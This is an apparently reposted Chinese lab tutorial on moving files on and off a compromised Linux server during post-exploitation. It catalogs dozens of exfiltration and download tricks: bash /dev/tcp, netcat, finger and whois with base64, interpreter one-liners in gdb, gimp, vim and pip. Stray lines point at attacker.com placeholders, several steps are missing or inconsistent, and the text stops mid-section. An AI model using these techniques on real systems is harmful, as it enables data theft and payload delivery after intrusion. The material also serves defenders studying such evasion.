Linux系統(tǒng)怎么在后滲透中的文件傳輸命令

本篇內(nèi)容介紹了“Linux系統(tǒng)怎么在后滲透中的文件傳輸命令”的有關(guān)知識(shí)，在實(shí)際案例的操作過程中，不少人都會(huì)遇到這樣的困境，接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細(xì)閱讀，能夠?qū)W有所成！

創(chuàng)新互聯(lián)是專業(yè)的福州網(wǎng)站建設(shè)公司，福州接單;提供網(wǎng)站設(shè)計(jì)、成都網(wǎng)站設(shè)計(jì),網(wǎng)頁設(shè)計(jì),網(wǎng)站設(shè)計(jì),建網(wǎng)站,PHP網(wǎng)站建設(shè)等專業(yè)做網(wǎng)站服務(wù);采用PHP框架,可快速的進(jìn)行福州網(wǎng)站開發(fā)網(wǎng)頁制作和功能擴(kuò)展;專業(yè)做搜索引擎喜愛的網(wǎng)站,專業(yè)的做網(wǎng)站團(tuán)隊(duì),希望更多企業(yè)前來合作!

一、操作目的和應(yīng)用場景

本文介紹Linux系統(tǒng)中進(jìn)行文件傳輸?shù)姆椒?，主要用于后滲透過程中。

在本文的每個(gè)例子中，標(biāo)題中的命令都是在Linux服務(wù)器上執(zhí)行的。

二、平臺(tái)及工具版本

Linux服務(wù)器：CentOS 7，192.168.43.234（部分CentOS 7系統(tǒng)無法實(shí)現(xiàn)的，在Kali Linux系統(tǒng)中實(shí)現(xiàn)）

遠(yuǎn)程主機(jī)1：Linux Mint 20，192.168.43.237

遠(yuǎn)程主機(jī)2：windows xp，192.168.43.87

三、Linux服務(wù)器將文件上傳到遠(yuǎn)程主機(jī)

1、 bash

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)監(jiān)聽12345端口

nc -l -p 12345 > bash.get

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用bash將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by bash." > bash.sent

bash -c 'cat bash.sent > /dev/tcp/192.168.43.237/12345'

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

2、 busybox

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用busybox啟動(dòng)web服務(wù)器

echo "sent by busybox." > busybox.sent

//啟動(dòng)http服務(wù)，監(jiān)聽12345端口，指定當(dāng)前目錄為工作目錄

busybox httpd -f -p 12345 -h .

第二步，遠(yuǎn)程主機(jī)從Linux主機(jī)下載文件

wget http://192.168.43.234:12345/busybox.sent -O busybox.get

文件傳輸成功。

3、 curl

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)phpstudy，創(chuàng)建文件，名為upload_file.php，內(nèi)容如下：

<?php

if ($_FILES["file"]["error"] > 0)

{

echo "錯(cuò)誤：" . $_FILES["file"]["error"] . "<br>";

}

else

{

//將文件保存在當(dāng)前目錄

move_uploaded_file($_FILES["file"]["tmp_name"], "./" . $_FILES["file"]["name"]);

echo "文件存儲(chǔ)在: " . "./" . $_FILES["file"]["name"];

echo "\n";

}

?>

保存退出。將upload_file.php放在web發(fā)布目錄中,之后啟動(dòng)web服務(wù)。文件上傳的URL為：

http://192.168.43.87/upload/upload_file.php

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用curl將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by curl" > curl.sent

curl http://192.168.43.87/upload/upload_file.php -F "file=@curl.sent" -v

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

4、 finger

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)監(jiān)聽79端口

sudo nc -l -p 79 | base64 -d > finger.get

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用finger上傳文件

echo "sent by finger" > finger.sent

finger "$(base64 finger.sent)@192.168.43.237"

第三步，遠(yuǎn)程主機(jī)查看收到的文件

文件傳輸成功。

5、 ftp

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)ftp服務(wù)

sudo python3 -m pyftpdlib -w -p 21

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用ftp將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by ftp." > ftp.sent

ftp 192.168.43.237

put ftp.sent ftp.get

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

6、 ftp-upload

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)ftp服務(wù)

sudo python3 -m pyftpdlib -w -p 21

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用ftp將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by ftp-upload." > ftp-upload.sent

perl ./ftp-upload -h 192.168.43.237 -u anonymous --password anonymous --as ftp-upload.get ftp-upload.sent

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

7、 gdb

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用gdb啟動(dòng)web服務(wù)

echo "sent by gdb." > gdb.sent

export LPORT=8888

gdb -nx -ex 'python import sys; from os import environ as e

if sys.version_info.major == 3: import http.server as s, socketserver as ss

else: import SimpleHTTPServer as s, SocketServer as ss

ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

wget http://192.168.43.234:8888/gdb.sent -O gdb.get

文件傳輸成功。

8、 gimp

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用gimp啟動(dòng)web服務(wù)

echo "sent by gimp." > gimp.sent

export LPORT=8888

gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e

if sys.version_info.major == 3: import http.server as s, socketserver as ss

else: import SimpleHTTPServer as s, SocketServer as ss

ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

wget http://192.168.43.234:8888/gimp.sent -O gimp.get

文件傳輸成功。

9、 irb

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用irb啟動(dòng)web服務(wù)

echo "sent by irb." > irb.sent

irb

require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;

exit

第二步，遠(yuǎn)程主機(jī)從LInux服務(wù)器下載文件

wget http://192.168.43.234:8888/irb.sent -O irb.get

文件傳輸成功。

10、 ksh

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用ksh監(jiān)聽本地端口

echo "sent by ksh." > ksh.sent

ksh -c 'cat ksh.sent > /dev/tcp/192.168.43.237/12345'

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

文件傳輸成功。

11、 nc

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)監(jiān)聽端口

nc -l -p 12345 > netcat.get

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用netcat將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by netcat." > netcat.sent

nc 192.168.43.237 12345 < netcat.sent

第三步，遠(yuǎn)程主機(jī)查看接收的文件

文件傳輸成功。

12、 openssl

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建證書并啟動(dòng)監(jiān)聽

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > openssl.get

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用openssl將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by openssl." > openssl.sent

openssl s_client -quiet -connect 192.168.43.237:12345 < "openssl.sent"

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

13、 php

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用php啟動(dòng)web服務(wù)

echo "sent by php." > php.sent

php -S 192.168.43.234:8888

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

wget http://192.168.43.234:8888/php.sent -O php.get

文件傳輸成功。

14、 pip

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用pip啟動(dòng)web服務(wù)

echo "sent by pip." > pip.sent

export LPORT=8888

TF=$(mktemp -d)

echo 'import sys; from os import environ as e

if sys.version_info.major == 3: import http.server as s, socketserver as ss

else: import SimpleHTTPServer as s, SocketServer as ss

ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py

pip3 install $TF

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

wget http://192.168.43.234:8888/pip.sent -O pip.get

文件傳輸成功。

注意，在本例中，pip所發(fā)布web內(nèi)容位于臨時(shí)目錄中，但不是/tmp/tmp.PBrtM68K5v，而是在/tmp/pip-jtub6bzs-build，需要將pip.sent文件復(fù)制到該目錄中才能下載。

15、 python

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用python啟動(dòng)web服務(wù)

echo "sent by easy_install" > easy_install.txt

python3 -m http.server 8080

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

wget http://192.168.43.234:8080/easy_install.txt

文件傳輸成功。

16、 restic

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)運(yùn)行SSH服務(wù)并啟用SFTP

systemctl start sshd

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用restic將文件上傳到遠(yuǎn)程主機(jī)

RHOST=192.168.43.237

RPORT=12345

echo "sent by restic." > restic.sent

//初始化存儲(chǔ)倉庫

restic -r sftp:root@192.168.43.237:/home/sftp/ftpuser1/upload init

//備份到遠(yuǎn)程存儲(chǔ)倉庫

restic -r sftp:root@192.168.43.237:/home/sftp/ftpuser1/upload backup restic.sent

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

17、 rsync

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)ssh服務(wù)。

systemctl start sshd

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用rsync將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by rsync." > rsync.sent

rsync -v -u -a -stat rsync.sent user1@192.168.43.237:/home/user1/rsync.get

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

18、 ruby

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用ruby啟動(dòng)web服務(wù)

echo "sent by ruby." > ruby.sent

ruby -run -e httpd . -p 8888

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

wget http://192.168.43.234:8888/ruby.sent -O ruby.get

文件傳輸成功。

19、 rvim

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用rvim啟動(dòng)web服務(wù)

export LPORT=8888

echo "sent by rvim." > rvim.sent

rvim -c ':py import vim,sys; from os import environ as e

if sys.version_info.major == 3: import http.server as s, socketserver as ss

else: import SimpleHTTPServer as s, SocketServer as ss

ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()

vim.command(":q!")'

服務(wù)啟動(dòng)后命令窗口全黑。

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

文件傳輸成功。

20、 scp

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)ssh服務(wù)。

systemctl start sshd

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用scp將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by scp." > scp.sent

scp scp.sent user1@192.168.43.237:/home/user1/scp.get

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

21、 sftp

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)運(yùn)行SSH服務(wù)并啟用SFTP

systemctl start sshd

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用sftp將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by sftp." > sftp.sent

sftp ftpuser1@192.168.43.237

put sftp.sent sftp.get

第三步，遠(yuǎn)程主機(jī)查看收到的文件

文件傳輸成功。

22、 smbclient

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)smb共享

sudo smbserver.py tmp ./  //smbclient在Impacker包中

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用smbclient將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by smbclient." > smbclient.sent

smbclient '\\192.168.43.237\TMP' -c 'put smbclient.sent smbclient.get'

第三步，遠(yuǎn)程主機(jī)查看收到的文件

文件傳輸成功。

23、 socat

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)啟動(dòng)監(jiān)聽

socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用socat將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by nmap." > nmap.sent

socat -u FILE:nmap.sent TCP:192.168.43.237:9876

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

24、 ssh

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)運(yùn)行ssh服務(wù)。

systemctl start sshd

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用ssh將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by ssh." > ssh.sent

ssh user1@192.168.43.237 "cat > ssh.get" < ssh.sent

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

25、 tar

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)運(yùn)行ssh服務(wù)

systemctl start sshd

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用tar將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by tar." > tar.sent

tar cvf user1@192.168.43.237:tar.get tar.sent --rsh-command=/bin/ssh

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

26、 tftp

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，遠(yuǎn)程主機(jī)運(yùn)行TFTP服務(wù)

apt-get install atftpd  //安裝tftp服務(wù)程序

mkdir /tmp/backup  //創(chuàng)建目錄

chmod 777 /tmp/backup  //修改權(quán)限

sudo atftpd --daemon --port 69 /tmp/backup  //啟動(dòng)服務(wù)程序

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用tftp將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by tftp." > tftp.sent

tftp 192.168.43.237

put tftp.sent tftp.get

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

27、 vim

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

第一步，Linux服務(wù)器創(chuàng)建測試文件并使用vim啟動(dòng)web服務(wù)器

echo "sent by vim." > vim.sent

export LPORT=8888

vim -c ':py import vim,sys; from os import environ as e

if sys.version_info.major == 3: import http.server as s, socketserver as ss

else: import SimpleHTTPServer as s, SocketServer as ss

ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()

vim.command(":q!")'

第二步，遠(yuǎn)程主機(jī)從Linux服務(wù)器下載文件

文件傳輸成功。

28、 whois

使用下面的命令將服務(wù)器本地文件上傳到遠(yuǎn)程主機(jī)：

方法1

第一步，遠(yuǎn)程主機(jī)啟動(dòng)監(jiān)聽

nc -l -p 12345 > whois.get

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用whois將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by whois." > whois.sent

whois -h 192.168.43.237 -p 12345 "`cat whois.sent`"

第三步，遠(yuǎn)程主機(jī)查看接收到的文件

文件傳輸成功。

方法2

第一步，遠(yuǎn)程主機(jī)啟動(dòng)監(jiān)聽

nc -l -p 12345 | tr -d $'\x0d' | base64 -d > whois.get

第二步，Linux服務(wù)器創(chuàng)建測試文件并使用whois將文件上傳到遠(yuǎn)程主機(jī)

echo "sent by whois again." > whois.sent

whois -h 192.168.43.237 -p 12345 "`base64 whois.sent`"

文件傳輸成功。

三、Linux服務(wù)器從遠(yuǎn)程主機(jī)下載文件

1、 bash

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并監(jiān)聽端口

echo "get by bash." > bash.sent

nc -l -p 12345 < bash.sent

第二步，Linux服務(wù)器使用bash從遠(yuǎn)程主機(jī)下載文件

bash -c 'cat < /dev/tcp/192.168.43.237/12345 > bash.get'

文件傳輸成功。

2、 curl

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by curl." > curl.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用curl從遠(yuǎn)程主機(jī)下載文件

curl http://192.168.43.237:8080/curl.sent -o curl.get

文件傳輸成功。

3、 finger

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行netcat監(jiān)聽端口

echo "get by finger." > finger.sent

base64 "finger.sent" | sudo nc -l -p 79

第二步，Linux服務(wù)器使用finger從遠(yuǎn)程主機(jī)下載文件

finger @192.168.43.237 | grep -v 192.168.43.237 | base64 -d > finger.get

文件傳輸成功。

4、 ftp

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)FTP服務(wù)

echo "get by ftp." > ftp.sent

python3 -m pyftpdlib -p 2121

第二步，Linux服務(wù)器使用ftp從遠(yuǎn)程主機(jī)下載文件

ftp 192.168.43.237

get ftp.sent ftp.get

文件傳輸成功。

5、 gdb

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by gdb." > gdb.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用gdb下載文件

export URL=http://192.168.43.237:8080/gdb.sent

export LFILE=gdb.get

gdb -nx -ex 'python import sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e["URL"], e["LFILE"])' -ex quit

文件傳輸成功。

6、 gimp

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by gimp." > gimp.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用gimp下載文件

export URL=http://192.168.43.237:8080/gimp.sent

export LFILE=gimp.get

gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e["URL"], e["LFILE"])'

文件傳輸成功。

7、 irb

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by irb." > irb.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用irb下載文件

export URL=http://192.168.43.237:8080/irb.sent

export LFILE=irb.get

irb

require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])

文件傳輸成功。

8、 jjs

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by jjs." > jjs.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用jjs下載文件

export URL=http://192.168.43.237:8080/jjs.sent

export LFILE=jjs.get

echo "var URL = Java.type('java.net.URL');

var ws = new URL('$URL');

var Channels = Java.type('java.nio.channels.Channels');

var rbc = Channels.newChannel(ws.openStream());

var FileOutputStream = Java.type('java.io.FileOutputStream');

var fos = new FileOutputStream('$LFILE');

fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);

fos.close();

rbc.close();" | jjs

文件傳輸成功。

9、 jrunscript

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by jrunscript." > jrunscript.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用irb下載文件

export URL=http://192.168.43.237:8080/jrunscript.sent

export LFILE=jrunscript.get

jrunscript -e "cp('$URL','$LFILE')"

文件傳輸成功。

10、 ksh

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行netcat監(jiān)聽端口

echo "get by bash." > ksh.sent

nc -l -p 12345 < ksh.sent

第二步，Linux服務(wù)器使用ksh下載文件

ksh -c 'cat < /dev/tcp/192.168.43.237/12345 > ksh.get'

文件傳輸成功。

11、 lwp-download

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by lwp-download." > lwp-download.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用lwp-download下載文件

URL=http://attacker.com/file_to_get

LFILE=file_to_save

lwp-download http://192.168.43.237:8080/lwp-download.sent lwp-download.get

文件傳輸成功。

12、 nc

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行netcat監(jiān)聽端口

echo "get by netcat." > netcat.sent

nc -l -p 12345 < netcat.sent

第二步，Linux服務(wù)器使用netcat下載文件

nc -l -p 12345 > netcat.get

nc 192.168.43.237 12345 > netcat.get

文件傳輸成功。

13、 openssl

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并創(chuàng)建證書并啟動(dòng)監(jiān)聽

echo "get by openssl." > openssl.sent

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < openssl.sent

第二步，Linux服務(wù)器使用openssl從遠(yuǎn)程主機(jī)下載文件

openssl s_client -quiet -connect 192.168.43.237:12345 > openssl.get

文件傳輸成功。

14、 php

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by php." > php.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用php下載文件

export URL=http://192.168.43.237:8080/php.sent

export LFILE=php.get

php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

文件傳輸成功。

15、 pip

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by pip." > pip.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用pip下載文件

export URL=http://192.168.43.237:8080/pip.sent

export LFILE=/home/user1/pip.get

TF=$(mktemp -d)

echo 'import sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e["URL"], e["LFILE"])' > $TF/setup.py

pip3 install $TF

文件傳輸成功。

16、 python

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by python." > python.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用python下載文件

export URL=http://192.168.43.237:8080/python.sent

export LFILE=python.get

python -c 'import sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e["URL"], e["LFILE"])'

文件傳輸成功。

17、 ruby

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by ruby." > ruby.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用ruby下載文件

export URL=http://192.168.43.237:8080/ruby.sent

export LFILE=ruby.get

ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'

文件傳輸成功。

18、 rvim

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by rvim." > rvim.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用rvim下載文件

export URL=http://192.168.43.237:8080/rvim.sent

export LFILE=rvim.get

rvim -c ':py import vim,sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e["URL"], e["LFILE"])

vim.command(":q!")'

文件傳輸成功。

19、 scp

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)SSH服務(wù)

echo "get by scp." > /home/user1/scp.sent

sudo systemctl start sshd

第二步，Linux服務(wù)器使用scp下載文件

scp user1@192.168.43.237:/home/user1/scp.sent /home/user1/scp.get

文件傳輸成功。

20、 sftp

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行SSH服務(wù)、啟用SFTP

echo "get by sftp." > /home/sftp/ftpuser1/sftp.sent

systemctl start sshd

第二步，Linux服務(wù)器使用sftp下載文件

sftp ftpuser1@192.168.43.237

get sftp.sent sftp.get

文件傳輸成功。

21、 smbclient

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)smb共享

echo "get by smbclient." > smbclient.sent

sudo smbserver.py tmp ./

第二步，Linux服務(wù)器使用smbclient下載文件

smbclient '\\192.168.43.237\TMP' -c 'get smbclient.sent smbclient.get'

文件傳輸成功。

22、 socat

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行socat監(jiān)聽端口

echo "get by socat." > socat.sent

socat -u file: socat.sent tcp-listen:12345,reuseaddr

第二步，Linux服務(wù)器運(yùn)行socat下載文件

socat -u tcp-connect:192.168.43.237:12345 open:socat.get,creat

文件傳輸成功。

23、 ssh

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行SSH服務(wù)

echo "get by ssh." > /home/user1/ssh.sent

sudo systemctl start sshd

第二步，Linux服務(wù)器使用ssh下載文件

ssh 192.168.43.237 "cat /home/user1/ssh.sent" > ssh.get

文件傳輸成功。

24、 tar

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行SSH服務(wù)

echo "get by tar." > tar.sent

tar cvf tar.sent.tar tar.sent

sudo systemctl start sshd

第二步，Linux服務(wù)器使用tar下載文件

RHOST=attacker.com

RUSER=root

RFILE=/tmp/file_to_get.tar

tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh

tar xvf user1@192.168.43.237:/home/user1/tar.sent.tar --rsh-command=/bin/ssh

文件傳輸成功。

25、 tftp

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行TFTP服務(wù)

mkdir /tmp/backup  //創(chuàng)建目錄

echo "get by tftp." > /tmp/backup/tftp.sent

chmod 777 /tmp/backup  //修改權(quán)限

sudo atftpd --daemon --port 69 /tmp/backup  //啟動(dòng)服務(wù)程序

第二步，Linux服務(wù)器使用tftp下載文件

tftp 192.168.43.237

get tftp.sent tftp.get

quit

文件傳輸成功。

26、 vim

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

